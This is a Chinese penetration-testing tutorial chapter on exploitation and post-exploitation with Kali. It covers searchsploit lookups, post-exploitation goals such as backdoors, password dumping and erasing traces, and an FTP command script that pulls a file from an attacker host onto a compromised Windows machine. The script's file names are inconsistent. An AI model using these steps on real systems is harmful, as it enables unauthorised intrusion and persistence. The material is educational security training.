《Kali渗透基础》09. 漏洞利用、后渗透
@
本系列侧重方法论,各工具只是实现目标的载体。
命令与工具只做简单介绍,其使用另见《安全工具录》。
本文以 kali-linux-2023.2-vmware-amd64 为例。
本文以原理为主。
这一部分技术更新换代很快。实操积累经验很重要。
1:漏洞基本介绍
1.1:漏洞从哪里来
- 罪恶的根源——变量:对用户可操作的变量没有做限制。
- 数据与代码边界不清。
如下,是一个最简单的漏洞原理:
!/bin/bash
echo $1 # 直接以命令行执行,只希望打印用户输入的字符。

数据?代码?
1.2:缓冲区溢出
缓冲区溢出(Buffer Overflow)的含义是为缓冲区提供了多于其存储容量的数据。
当缓冲区边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被 “ 撑爆 ” ,从而覆盖了相邻内存区域的数据。
如果人为成功修改内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果。
参考文章:《缓冲区溢出攻击》
Windows 避免缓冲区溢出攻击的策略:
- DEP:阻止代码从数据页被执行
- ASLR:随机内存地址加载执行程序和 DLL,每次重启地址变化
Linux 避免缓冲区溢出攻击的策略:
- DEP
- ASLR
- 堆栈 cookies
- 堆栈粉碎
1.3:如何发现漏洞
- 源码审计
- 逆向工程
- 模糊测试(Fuzz Testing)
- 向程序堆栈注入半随机的数据,根据内存变化判断是否溢出
- 数据生成器:生成随机、半随机数据
- 测试工具:识别溢出漏洞
2:漏洞利用
除了手工发现漏洞,对于扫描到的已知漏洞,可以寻找已有的 EXP,在此基础上修改,以此适用于相关的项目。
“ EXP ” 通常指漏洞利用(Exploitation)或漏洞利用代码(Exploit)。
2.1:EXP 选择与修改
- 对于网上公开的 EXP 代码,选择可信赖的 EXP 源(Exploit-db 等)。
- Kali 自带工具:Searchsploit。
- 要有能力修改 EXP(Python、Perl、Ruby、C、C++...)以满足不同环境需要。
示例01:使用 searchsploit 查询漏洞代码:
查找相关 EXP:
searchsploit windows .py
查询 EXP 路径:
searchsploit -p 38959.py
拷贝到当前文件夹:
cp /usr/share/exploitdb/shellcodes/generator/38959.py 38959.py
EXP 内容:

2.2:避免有害的 EXP
- 不同的 EXP 对应不同的软件版本、offset、shellcode。
- 系统补丁修补漏洞。
- 扫描探测目标系统版本,搭建适当的测试环境。
- 避免一锤子测试,了解漏洞原理,修改溢出代码。
3:后渗透阶段
在漏洞利用,获得目标控制权后:
- 上传文件,加强控制
- 提权,扩大对目标系统的控制能力
- 擦除攻击痕迹
- 安装后门,持久控制
- Dump 密码,提取目标系统中存储的用户密码信息
- 内网渗透
对于后渗透阶段:
- 最大的挑战:防病毒软件
- 使用合适的远程控制软件
3.1:Linux 上传文件
控制目标后,若目标是 Linux 系统,可选择以下方式上传文件:
- netcat
- curl
- wget
以上都是 Linux 预装的工具,或者是很容易在 Linux 上安装的工具。
3.2:Windows 上传文件
Windows 缺少预装的下载工具。有以下方法传输文件:
TFTP:
- XP、2003 默认安装。其他 Win 系统要单独添加。
- 经常被边界防火墙过滤。
- Kali 上,使用
atftpd命令作为服务器共享文件。 - Windows 上,使用
tftp命令获取文件。
FTP:
- 适用性比较广。
- Linux 上可能需要安装 FTP 服务。
- Windows 上,使用
echo命令将相关操作写入 txt 文件。 - 然后 Windows 上使用
ftp命令操作此 txt 文件以获取下载。 - 示例如下:
# 因为多是以命令行控制,为防止出现问题,将命令写入文件执行
# 假设 kali(192.168.1.129)已经控制了目标系统 Windows
# 且 ftp 用户名:user1。密码:PassWorD
# 在控制的系统中分别执行以下命令
echo open 192.168.1.129 21 > ftp_test.txt
echo user1 >> ftp_test.txt
echo PassWorD >> ftp_test.txt
echo bin >> ftp_test.txt
echo GET whoami.exe >> ftp_test.txt
echo bye >> ftp_test.txt
# 完成后执行即可
ftp -s:ftp.txt
VBScript(Visual Basic Scripting Edition),一种微软开发的脚本语言,用于在 Windows 上编写和执行脚本。
DeBug:二进制文件操作。
除此以外,在 Kali 中 /usr/share/windows-binaries/ 目录下自带了一些可以上传到 Windows 上使用的工具,便于后续操作。

闭心塞意,不高瞻览者,死人之徒也哉!
——《论衡》(东汉)王充
《Kali渗透基础》09. 漏洞利用、后渗透的更多相关文章
- Springboot之Actuator的渗透测试和漏洞利用
背景概述 Spring的生态很优秀,而使用Spring Boot的开发者也比较多. Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动 ...
- kali linux之选择和修改exp与windows后渗透
网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......) ...
- 带你了解后渗透工具Koadic
前言: 在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧. 首先把项目克隆到本地: 项目地址 ...
- Enumy:一款功能强大的Linux后渗透提权枚举工具
Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enum ...
- EXP查询合集提权后渗透必备
0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of priv ...
- Kali Linux渗透基础知识整理(三):漏洞利用
漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透.网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的.顾名思义,利用漏洞,达到攻击的目的. Metasploit Framework rdeskt ...
- Kali Linux渗透基础知识整理(二)漏洞扫描
Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网 ...
- Wordpress 漏洞利用与后渗透
[作业]ColddBox 靶场 Wordpress 漏洞利用与后渗透. 突破口 渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章.特别 注意的是一定 ...
- 小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:ser ...
- Kali Linux渗透基础知识整理(四):维持访问
Kali Linux渗透基础知识整理系列文章回顾 维持访问 在获得了目标系统的访问权之后,攻击者需要进一步维持这一访问权限.使用木马程序.后门程序和rootkit来达到这一目的.维持访问是一种艺术形式 ...
随机推荐
- Vue+Element中Table懒加载,新增、删除操作后手动更新
Vue+Element中Table懒加载,新增.删除操作后手动更新 今天开发一个自动分类管理系统中行业类型管理,使用table tree 进行节点懒加载,遇到的问题是:使用load 进行懒加载后在ta ...
- k8s calico网络
- 关于Unity3D第一视角下镜头穿墙的问题解决方法
昨天做室内模型的时候,遇到一个非常棘手的问题,那就是第一视角在室内运行的时候,会出现穿墙的效果.类似下图效果,在靠近墙壁的时候,出现了镜头看见了墙壁外的情况,很显然这是不符合逻辑的.我们要做的就是避免 ...
- 【Python入门教程】Python常用表格函数&操作(xlrd、xlwt、openpyxl、xlwings)
在我们使用Python时,避免不了与Excel打交道.同样Python的三方库和代码的简洁性也为我们处理大数据提供了便利.今天给大家介绍一下常用的处理表格的函数,同时还有一些常用的 ...
- Falcon 登陆 Hugging Face 生态
引言 Falcon 是由位于阿布扎比的 技术创新研究院 (Technology Innovation Institute,TII) 创建的一系列的新语言模型,其基于 Apache 2.0 许可发布. ...
- ARC118E Avoid Permutations
题意 给定一个长度为 \(n\) 的排列 \(p\),在一个 \((n + 2)\times(n + 2)\) 的网格上,禁止通过 \((i, p_i)\) 这些点,每次只能向上或右走一格,从 \(( ...
- 【AI在网络安全中的应用:趋势和未来】展望
目录 [AI在网络安全中的应用:趋势和未来]- 展望 随着数字化和智能化的不断深入,网络安全问题越来越受到人们的关注.其中,人工智能技术在网络安全领域中的应用已成为当前研究的热点之一.本文将探讨AI在 ...
- vCenter报错:Vmware vAPI Endpoint
vCenter报错:Vmware vAPI Endpoint 问题现象: 平台警报1:设备管理运行状况警报 平台警报2:Vmware vAPI Endpoint服务运行状况警报 vcenter版本:v ...
- PB从入坑到放弃(一)第一个HelloWorld程序
前言 网上关于PowerBuilder的资料确实是少之又少. 为了方便,后面我们都用pb 来代替PowerBuilder 说到这不得不来说说自己的pb入坑经历, 自己也不是计算机科班出生. 刚到公司面 ...
- mybatis 部分符号需转译 及 IF如何正确判断单个数字字符
mybatis 部分符号需转译 及 IF如何正确判断单个数字字符 1.Mybatis 转译字符如下下法即可: oracle中的日期查询在mybatis中写法可以参考如下:注意提交时间的<号是用特 ...